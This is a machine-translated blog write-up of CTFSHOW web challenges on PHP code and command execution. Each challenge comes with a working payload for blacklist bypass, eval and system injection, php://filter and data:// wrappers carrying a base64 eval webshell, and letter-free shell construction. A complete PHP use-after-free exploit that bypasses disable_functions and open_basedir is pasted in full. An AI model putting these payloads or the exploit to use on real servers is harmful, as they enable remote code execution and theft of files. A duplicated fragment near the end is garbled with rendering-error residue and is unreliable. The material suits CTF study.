Command execution and code execution in PHP

Title: command execution and code execution in PHP data: 2021-09-15 tags: CTF-web Command execution and code execution i...
Command execution and code execution
Functions for opening files in linux:
Some common bypass poses:
CTFSHOW command execution

Title: command execution and code execution in PHP
data: 2021-09-15
tags: CTF-web

Command execution and code execution in PHP

Recently, I learned some knowledge before review. Because it was 0 basic to learn before, many things may not be understood. Now review the command execution section. Learned a lot of knowledge.

Then the topic is all from the web portal of CTFSHOW.

It's so friendly for a novice like me!

Command execution and code execution

In PHP, we should first find out what is code execution and what is command execution.

Generally speaking, code execution is the execution of PHP code. Command execution is to execute commands under linux system.

There is a difference between the two. Some code looks wrong in php, but it is correct in linux.

Reanalysis is encountered in the following article.

Common code execution functions

In PHP, we are allowed to pass in PHP code and execute it ourselves. We usually use the following:

1.eval($string): Treat the string in the parameter as php Code execution. The string must be legal code and must end with a semicolon. Legal codes and semicolon endings are emphasized here. We can understand that eval()Performed an equivalent to $string add to php The function of short label is <?php $string When semicolons cannot be used, they can be used?>Instead. because php In grammar, the last sentence php The code may not be closed. #It should be noted here that eval() is a language constructor rather than a function and cannot be called by variable functions. ------------------------------------------------------------------------------------------------------------------- 2.assert($assertion): If assertion Is a string,Then it will be assert()As php Code execution. And may not end with a semicolon. #Before PHP7, assert was used as a function. After PHP7, assert is the same as eval. They are all language constructors. This knowledge point may appear in$_ In POST[1]($_POST[2]) ------------------------------------------------------------------------------------------------------------------- 3.call_user_func($func,$string): This function is used for function calls. We use the first parameter as the calling function and the second as the parameter of the callback function. Not code execution. It can only be said to be a hazard function.

Common command execution functions:

In PHP, it allows us to execute system program commands. Generally, there are the following functions:

1.system(): Execute an external program command, output the execution result, and return the last line. #Here, understand the output execution result and return the last line. It refers to printing the result of command execution first, and then taking the last line as the return value. #It can be understood that there is a print ($result) inside the function; return last->result; Like this. #If the command needs to be separated by spaces, you need to quote the executed command. ------------------------------------------------------------------------------------------------------------------- 2.exec(): Execute an external program. And return the content of the last line of the execution result. #Only the last line of the execution result is returned here. There will be no output printing. ------------------------------------------------------------------------------------------------------------------- 3.passthru(): Execute the external program and display the original output ------------------------------------------------------------------------------------------------------------------- 4.shell_exec():This function is equivalent to ` ` adopt shell The environment executes the command and returns the complete output as a string. #The function does not display execution results. You need to add echo to print the output results`` It's a shell_ A simplified form of exec(). It's actually the same function. -------------------------------------------------------------------------------------------------------------------

Functions for opening files in linux:

more:Display file contents page by page less:And more similar head:View the first few lines tac:Starting from the last line, you can see tac yes cat Reverse display of tail:View last few lines nl: When displaying, output the line number by the way od:Read file contents in binary mode vi:An editor, which can also be viewed vim:An editor, which can also be viewed sort:Can view uniq:Can view

Some common bypass poses:

Bypass of spaces: 1.%09 2.redirect <> 3.$ 4./**/ annotator Some strings are filtered: 1.cat--> ca\t 2.flag-->fl\ag-->fla''g 3.f*-->fla?????

CTFSHOW command execution

web 29:

<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } #payload:?c=system(cat f*);

There's nothing to say. Filtered the flag. But just go around. Take a chestnut.

stay linux In the system: ca\t f''lag.php == cat flag.php ca\t f\lag.php == cat flag.php There's nothing to say

web 30:

<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } #payload:?c=passthru('cat f*');

The system is filtered and replaced by passthru.

web 31: space filtering

<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } #payload:?c=passthru('more%09f*');

Spaces are filtered. Use% 09 instead. You can also use

web 32-35: semicolon filtering

<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } #payload:?c=include"$_GET[1]"?>&1=php://filter/convert.base64-encode/resource=flag.php ### web 33: single and double quotation marks filtered #payload:?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php ### web 34: filtered: #payload:?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php ### web 35: #payload:?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php ### web 36: filtered numbers #payload:?c=include$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

This question is filtered because of semicolons. So we use? > close. And php has many functions without parentheses. Therefore, here we take advantage of this include and combine the vulnerabilities contained in the file

web 37,38: file contains

<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c); echo $flag; } }else{ highlight_file(__FILE__); } #payload: GET:?c=data://text/plain;base64,PD9waHAgZXZhbCgkX1BPU1RbMV0pPz4= POST:1=system("cat flag.php");

Obviously, the file contains the PHP code to execute. Because the flag is filtered, we cannot use the filter protocol.

Then use the data protocol to write the horse.

web 39:

<?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c.".php"); } }else{ highlight_file(__FILE__); } #payload:?c=data://text/plain;base64,<?php system("cat f*")?>

Here. php is added after c, but our code is closed. It doesn't matter if you have this. php

web 40: nonparametric RCE

<?php if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } #payload:?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
Localeconv()Returns an array containing local number and currency format informationThe first value of this function is "."Cuurent()Returns the value of the current element in the arrayNext()The pointer points to the next element and outputsArray_reverse()Returns an array in reverse orderPrint_r()Print variablesHiglight_fileHighlight the file. There's nothing to sayShow_sourceWith highlight_file has the same effect.Array_reverseInverted arrayArray_randRandomly fetch one or more cells in the arrayArray_filpSwap keys and values of arraysReadfileread filesessionid()Returns the current session IDscandir(directory,sorting_order,context)Returns files and directories as an arrayThe first parameter is the directory and the second is the sorting methodposTake the first value

web 41: or construction of alphanumeric webshell

There's nothing to say about this question. ban has XOR and negation. Left or. Then use or construct

<?php if(isset($_POST['c'])){ $c = $_POST['c']; if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){ eval("echo($c);"); } }else{ highlight_file(__FILE__); } ?> #payload:c='');('%13%19%13%14%05%0D'|'%60%60%60%60%60%60')(('%03%01%14'|'%60%60%60').' '.('%06%0C%01%07%02%10%08%10'|'%60%60%60%60%2C%60%60%60'));//

First, we need to splice this $c to complete the construction of php statements. First splice an echo (''); shell;//);

Then replace the middle shell with our constructed system('cat flag.php ')

It should be noted here that the connection is converted into a string. We don't have to build it.

Paste a big guy's construction script

<?php $payload = 'flag.php';//Letters to be constructed $length = strlen($payload); $a = ''; $b = ''; $flag = 0; echo '<br>'; for ($l = 0; $l < $length; $l++) { $flag=0; for ($i = 1; $i < 256; $i++) { if(preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i',chr($i))) continue; for ($j = 1; $j < 256; $j++) { if(preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i',chr($j))) continue; if ((chr($i) | chr($j)) === $payload[$l]) { echo urlencode(chr($i)); $a=$a.urlencode(chr($i)); echo '|'; echo urlencode(chr($j)); $b=$b.urlencode(chr($j)); echo '=' . $payload[$l]; echo "<br>"; $flag=1; break; } } if($flag===1){ break; } } } echo $a.'|'.$b;

web 42: canceling echo

<?php if(isset($_GET['c'])){ $c=$_GET['c']; system($c." >/dev/null 2>&1"); }else{ highlight_file(__FILE__); } #payload:?c=cat flag.php;

>/Dev / null 2 > 1 & 1 means no echo. In that case, we can directly split the statements.

The following split statements are available in Linux:

; //semicolon | //Only execute the latter command || //Just execute the previous command & //Both commands are executed && //Both commands are executed

You can also use php's%0a for line feed processing.

web 43~52:

<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat/i", $c)){ system($c." >/dev/null 2>&1"); } }else{ highlight_file(__FILE__); } #payload:?c=nl flag.php|| ### web 44: multi filtered flag s #payload:?c=nl fla\g.php|| ### web 45: multiple spaces filtered, bypassed with% 09 #payload:?c=nl%09fla\g.php|| ### web 46: multi filtered $, numbers* #payload:?c=nl<fla\g.php|| ### web 47: how many more TACs are filtered #payload:?c=nl<fla\g.php|| ### web 48: multi filtered awk,sed,cut,od,curl #payload:?c=nl<fla\g.php|| ### web 49: kill #payload:?c=nl<fla\g.php|| ### web 50: kill #payload:?c=nl<fla\g.php|| ### web 51: #payload:?c=nl<fla\g.php|| ### web 52: multi filter redirection. Change your posture. #payload:?c=nl$fla\g.php||

web 53:

<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){ echo($c); $d = system($c); echo "<br>".$d; }else{ echo 'no'; } }else{ highlight_file(__FILE__); } #payload:?c=nl$fla\g.php

I was just typing a question when I suddenly found that the question had changed. Yes, but not completely. Remove the flag.

I tried it myself. It is found that the first two commands must exist in the process of using. No problem

web 54:ban a lot

<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); } #payload:?c=vi$????????

This question ban is too much. And we're not allowed to splice. But the problem is not big. We also have vim,vi,uniq

web 55: the clever use of matching characters

<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); }

You can see that there are no filtered spaces here. But ban the letter semicolon, anti single quotation mark, redirection. Mainly, we can't construct commands without letters.

Learn posture here

Pose 1: first, we understand that the bin directory will store commands we can use. Since there are no letters, let's find some commands with numbers to execute

#payload1:? c=/???/???? 64 ???????? ---> After matching is:? c=/bin/base64 flag.php

Pose 2: there is a bzip2 compression command in the: / usr/bin directory. And some application software tools.

#payload2:? c=/???/???/???? 2 ???????? ---> After matching is:? c=/usr/bin/bzip2 flag.php will generate a file of flag.php.bz2 #Then access this file

Posture 3: Alphanumeric webshell improvement (P God)

too 🐂 I read this article. Worship

. command. The usage of source command under linux is

use source <file name> Use current shell Execute a command in a file As shown in the figure. my flag.php What's in it cat test.txt . test.txt What's in it hello world!

So now we have. At this time, make use of a feature of PHP.

We POST When a file is, it is saved to/tmp/phpXXXXXX The last six digits of the file are random upper and lower case letters. We can use wildcards without affecting.

But there are many such files in our Linux. So how can we accurately locate the file we uploaded?

Wildcards in LINUX except *? There are other uses.

as/???/???[-]?????? Indicates that the third position is- And we use another one[@-]] among@express ascii Value 64,[Indicates 91.Then you can read the capital letters

So let's upload a file now. Then this method is used to achieve command execution. Because the last number is random, you can try several more times.

web 56: Alphanumeric webshell

<?php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){ system($c); } }else{ highlight_file(__FILE__); }

This question also ban the numbers. Then the two payload s above won't work. Only the last one can be used.

web 57:LINUX digital construction

<?php //flag in 36.php if(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){ system("cat ".$c.".php"); } }else{ highlight_file(__FILE__); }

Obviously, we know that the flag is 36.php. Then we can construct c=36.

stay LINUX Below: $(())=0 $((~$(())))=-1 For ease of understanding. We put-1 Set as a.Namely a=$((~$(())))=-1 that $((aaaa))=-4 That is, this expression is added by default $((~$((aaaa))))=3 Take the inverse minus 1. So let's construct 37 directly a
payload: $((~$((aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa)))) Again a replace with $((~$(()))) $((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))

Get the flag.

web 58:disable_functions bypass

<?php if(isset($_POST['c'])){ $c= $_POST['c']; eval($c); }else{ highlight_file(__FILE__); } #payload:c=show_source('/var/www/html/flag.php'); ### web 59: #payload:c=show_source('/var/www/html/flag.php'); ### web 60: #payload:c=show_source('/var/www/html/flag.php'); ### web 61: #payload:c=show_source('/var/www/html/flag.php'); ### web 63: #payload:c=show_source('/var/www/html/flag.php'); ### web 64: #payload:c=show_source('/var/www/html/flag.php'); ### web 65: #payload:c=show_source('/var/www/html/flag.php'); ### web 66:ban show_source #payload:c=print_r(scandir("../../../")); #payload:c=highlight_file("/flag.txt"); ### web 67: #payload:c=highlight_file("/flag.txt"); ### There are more web 68:ban, which exploits the File Inclusion Vulnerability. txt can be included directly. php uses pseudo protocol. #paylaod:c=include("/flag.txt"); ### web 69: #paylaod:c=include("/flag.txt"); ### web 70: #paylaod:c=include("/flag.txt");

When I got the title, I thought?? That's it?? Directly a system("ls"). It is found that the system is ban.

I found that the top of my list was ban. phpinfo was also by ban.

But isn't this our word? That can be directly connected to the number on the ant sword.

Expected solution: Because we can't use command execution to read files. So we can only use php Execute the code to read the file. common php Read file yes 1. highlight_file() 2. file_get_contents() 3. show_source() 4. fgets() 5. file() 6. readfile()
Other postures: c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgets($a);echo $line;} copy("flag.php","flag.txt"); rename("flag.php","flag.txt");

web 71: early termination

<?php error_reporting(0); ini_set('display_errors', 0); // Are you showcasing your skills? if(isset($_POST['c'])){ $c= $_POST['c']; eval($c); $s = ob_get_contents(); ob_end_clean(); echo preg_replace("/[0-9]|[a-z]/i","?",$s); }else{ highlight_file(__FILE__); } ?> Are you going to heaven? #payload:include("/flag.txt");die; Or include("/flag.txt");exit();

Or use the above payload to find that all letters and numbers have been replaced with?. At this time, we can terminate the execution in advance.

web 72: bypass open_dir and disabled_functions.glob: / / pseudo protocol

<?php error_reporting(0); ini_set('display_errors', 0); // Are you showcasing your skills? if(isset($_POST['c'])){ $c= $_POST['c']; eval($c); $s = ob_get_contents(); ob_end_clean(); echo preg_replace("/[0-9]|[a-z]/i","?",$s); }else{ highlight_file(__FILE__); } ?> Are you going to heaven?

open_basedir(): restrict the user's access directory to the directory in the parameter.

glob: pseudo protocol

Find matching file path patterns example: <?php // Loop through all *. php files in the ext/spl/examples / directory // And print the file name and file size $it = new DirectoryIterator("glob://ext/spl/examples/*.php"); foreach($it as $f) { printf("%s: %.1FK\n", $f->getFilename(), $f->getSize()/1024); } ?> Then we will print all files in the root directory: #c=$a=new DirectoryIterator("glob:///*");foreach($a as $f)exit();

You can see that the flag file is flag0.txt. However, we still can't use include("/flag0.txt"); Because open_ The existence of basedir () limits our access directory.

Use ant sword plug-in or script to bypass open_basedir() and disabled_function():

<?php pwn("uname -a"); function pwn($cmd) { global $abc, $helper, $backtrace; class Vuln { public $a; public function __destruct() { global $backtrace; unset($this->a); $backtrace = (new Exception)->getTrace(); # ;) if(!isset($backtrace[1]['args'])) { # PHP >= 7.4 $backtrace = debug_backtrace(); } } } class Helper { public $a, $b, $c, $d; } function str2ptr(&$str, $p = 0, $s = 8) { $address = 0; for($j = $s-1; $j >= 0; $j--) { $address <<= 8; $address |= ord($str[$p+$j]); } return $address; } function ptr2str($ptr, $m = 8) { $out = ""; for ($i=0; $i < $m; $i++) { $out .= sprintf("%c",($ptr & 0xff)); $ptr >>= 8; } return $out; } function write(&$str, $p, $v, $n = 8) { $i = 0; for($i = 0; $i < $n; $i++) { $str[$p + $i] = sprintf("%c",($v & 0xff)); $v >>= 8; } } function leak($addr, $p = 0, $s = 8) { global $abc, $helper; write($abc, 0x68, $addr + $p - 0x10); $leak = strlen($helper->a); if($s != 8) { $leak %= 2 << ($s * 8) - 1; } return $leak; } function parse_elf($base) { $e_type = leak($base, 0x10, 2); $e_phoff = leak($base, 0x20); $e_phentsize = leak($base, 0x36, 2); $e_phnum = leak($base, 0x38, 2); for($i = 0; $i < $e_phnum; $i++) { $header = $base + $e_phoff + $i * $e_phentsize; $p_type = leak($header, 0, 4); $p_flags = leak($header, 4, 4); $p_vaddr = leak($header, 0x10); $p_memsz = leak($header, 0x28); if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write # handle pie $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr; $data_size = $p_memsz; } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec $text_size = $p_memsz; } } if(!$data_addr || !$text_size || !$data_size) return false; return [$data_addr, $text_size, $data_size]; } function get_basic_funcs($base, $elf) { list($data_addr, $text_size, $data_size) = $elf; for($i = 0; $i < $data_size / 8; $i++) { $leak = leak($data_addr, $i * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'constant' constant check if($deref != 0x746e6174736e6f63) continue; } else continue; $leak = leak($data_addr, ($i + 4) * 8); if($leak - $base > 0 && $leak - $base < $data_addr - $base) { $deref = leak($leak); # 'bin2hex' constant check if($deref != 0x786568326e6962) continue; } else continue; return $data_addr + $i * 8; } } function get_binary_base($binary_leak) { $base = 0; $start = $binary_leak & 0xfffffffffffff000; for($i = 0; $i < 0x1000; $i++) { $addr = $start - 0x1000 * $i; $leak = leak($addr, 0, 7); if($leak == 0x10102464c457f) { # ELF header return $addr; } } } function get_system($basic_funcs) { $addr = $basic_funcs; do { $f_entry = leak($addr); $f_name = leak($f_entry, 0, 6); if($f_name == 0x6d6574737973) { # system return leak($addr + 8); } $addr += 0x20; } while($f_entry != 0); return false; } function trigger_uaf($arg) { # str_shuffle prevents opcache string interning $arg =str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'); $vuln = new Vuln(); $vuln->a = $arg; } if(stristr(PHP_OS, 'WIN')) { die('This PoC is for *nix systems only.'); } $n_alloc = 10; # increase this value if UAF fails $contiguous = []; for($i = 0; $i < $n_alloc; $i++) $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'); trigger_uaf('x'); $abc = $backtrace[1]['args'][0]; $helper = new Helper; $helper->b = function ($x) { }; if(strlen($abc) == 79 || strlen($abc) == 0) { die("UAF failed"); } # leaks $closure_handlers = str2ptr($abc, 0); $php_heap = str2ptr($abc, 0x58); $abc_addr = $php_heap - 0xc8; # fake value write($abc, 0x60, 2); write($abc, 0x70, 6); # fake reference write($abc, 0x10, $abc_addr + 0x60); write($abc, 0x18, 0xa); $closure_obj = str2ptr($abc, 0x20); $binary_leak = leak($closure_handlers, 8); if(!($base = get_binary_base($binary_leak))) { die("Couldn't determine binary base address"); } if(!($elf = parse_elf($base))) { die("Couldn't parse ELF header"); } if(!($basic_funcs = get_basic_funcs($base, $elf))) { die("Couldn't get basic_functions address"); } if(!($zif_system = get_system($basic_funcs))) { die("Couldn't get zif_system address"); } # fake closure object $fake_obj_offset = 0xd0; for($i = 0; $i < 0x110; $i += 8) { write($abc, $fake_obj_offset + $i, leak($closure_obj, $i)); } # pwn write($abc, 0x20, $abc_addr + $fake_obj_offset); write($abc, 0xd0 + 0x38, 1, 4); # internal func type write($abc, 0xd0 + 0x68, $zif_system); # internal func handler ($helper->b)($cmd); exit(); }

web 73:

There is no answer to this question_ Basedir restrictions

#payload:c=include("/flagc.txt");exit();

web 74:

#payload:c=$a=new DirectoryIterator("glob:///*");foreach($a as $f)exit(); #payload:c=include("/flagx.txt");exit();

web 75, 76: load through database_ The file function bypasses open_basedir restrictions

#payload:c=$a=new DirectoryIterator("glob:///*");foreach($a as $f)exit(); c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');//Connect to database foreach($dbh->query('select load_file("/flag36.txt")') as $row)//Using load_file load the file flag36.txt $dbh = null;} catch (PDOException $e) exit(0);

This position is amazing. But first you have to get the configuration file of the database.

web 77:FFI read file (PHP > = 7.4)

#payload:c=$ffi=FFI::cdef("int system(char *command);", "libc.so.6");$a='/readflag > 1.txt';$ffi->system($a);exit();
FFI(Foreign Function Interface),External function interface refers to the technology of calling code in another language in one language. PHP of FFI Expansion is a way for you to PHP Call in C Code technology. $ffi = FFI::cdef("int system(const char *command);");//Create a system object $a=''cat /flag36x.txt > 1.txt';//Because there is no echo $ffi->system($a);//Call the system function through $ffi however flag36x.txt It's empty. Then we execute readflag Give orders.

Web 118: clever use of environment variables under Linux

As shown in the figure:

Lower case letters are filtered out. Then we use slicing technology to construct our Payload. It can be seen that ~ capital letters take the last place.

Add this picture in Hint. The current catalogue must be in the title P W D = / v a r / w w w / h t m l . and =/var/www/html PWD=/var/www/html. If generally ends in bin, nl flag.php is constructed

#payload:$$ ????.???

Web 119120: clever use of environment variables under Linux

$ is disabled for this problem, so we need to find other alternatives.

stay LINUX lower ${#variable} Represents the length of the variable value. as ${#$a} a=12345. that ${#$a}=5. It can be understood that the strlen function has the same effect. $ The value of is generally 1.that ${#$}=1 $:Return 0~32767 A random number, in which the probability of 4 and 5 digits is greater. that ${#RANDOM}=4 or 5 is more likely. Then we use the above matching command for blind typing.
#payload:$}???$}?????${#RANDOM} ????.??? =>/bin/base64 flag.php You may need to try a few more times because of this random Spit out 4 is random.

web 121:SHLVL filtering

stay linux Down. ${#?}=1 #payload1:$}???$}?????${#RANDOM} ????.??? #payload2:$}???$}$:${#?}}?? ????.??? Because here ${#IFS} is a space character, tab character and line feed character. Then the length is $ and / var/www/html under PWD. So it just matches r. Reuse rev flag.php Each line in the file is output in reverse order

web 122: PWD filtered

#payload:code=<A;$???$?????$ ????.??? yu Said the master ${}The error is returned locally at 1, but the problem environment is 2, so it is released< <A The error return is also 1, so the number 1 is successfully obtained, and the number 4 is obtained RANDOM Just random.

web 124:CISCN 2019 LOVE MATH

An original question of the national competition. The core test point is the use of alphanumeric web shell and mathematical functions.

<?php error_reporting(0); //I heard you like math very much. I don't know if you love it more than flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //Example c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("It's too long to count"); } $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]']; foreach ($blacklist as $blackitem) { if (preg_match('/' . $blackitem . '/m', $content)) { die("Please do not enter strange characters"); } } //Common mathematical functions http://www.w3school.com.cn/php/php_ref_math.asp $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh']; preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs); foreach ($used_funcs[0] as $func) { if (!in_array($func, $whitelist)) { die("Please do not enter strange functions"); } } //Help you figure out the answer eval('echo '.$content.';'); }

The first thing we want to construct is system("cat /f *");

Then because there are only mathematical functions in the white list. So let's try to construct c= _ G E T [ a ] \_GET[a] _ GET[a]_ RCE is achieved in the form of get [b].

Then construct first_ GET. Because mathematical functions are allowed, we use a hex2bin to_ GET is expressed in hexadecimal.

_GET=hex2bin(5f474554)

But our hex2bin is not in the scope of the given function. Then we continue to find out whether there are available functions to encrypt and decode hex2bin. We see a base_convert function. Then a conversion can be made.

Found in the binary conversion, only 36 binary will not be lost after transcoding. So we use base_convert(10,36)

payload:base_convert(37907361743,10,36)(5f474554)–>hex2bin(5f474554)—>_ GET

Because 5f474554 cannot be matched directly. Then we also need a function dechex(1598506324)=5f474554

#payload:?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi($$pi);&max=system&min=cat flag.php

an', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, u s e d f u n c s ) ; f o r e a c h ( used_funcs); foreach ( usedf​uncs);foreach(used_funcs[0] as KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (!in_array(func, KaTeX parse error: Expected 'EOF', got '}' at position 62: … } } ̲ // Help you figure out the answer... content. ';');
}

The first thing we want to construct is system("cat /f*"); Then, because there are only mathematical functions in the white list, let's try to construct c=$\_GET[a]$\_GET[b]In the form of RCE. Then construct first\_GET.Because mathematical functions are allowed, we use one hex2bin Lai Jiang\_GET Expressed in hexadecimal. _GET=hex2bin(5f474554) But our hex2bin It is not within the scope of the given function. Then we continue to find out whether there are available functions hex2bin Encryption and decoding. We see one base_convert Function. Then you can make a conversion. In the base conversion, only the base 36 will not be lost after transcoding. Then we use base_convert(10,36) Namely payload:base_convert(37907361743,10,36)(5f474554)-->hex2bin(5f474554)--->_GET Because 5 f474554 Can't match directly. Then we need a function dechex(1598506324)=5f474554 ```php #payload:?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi($$pi);&max=system&min=cat flag.php

4 October 2021, 20:28 | Views: 4637

Add new comment

For adding a comment, please log in
or create account

0 comments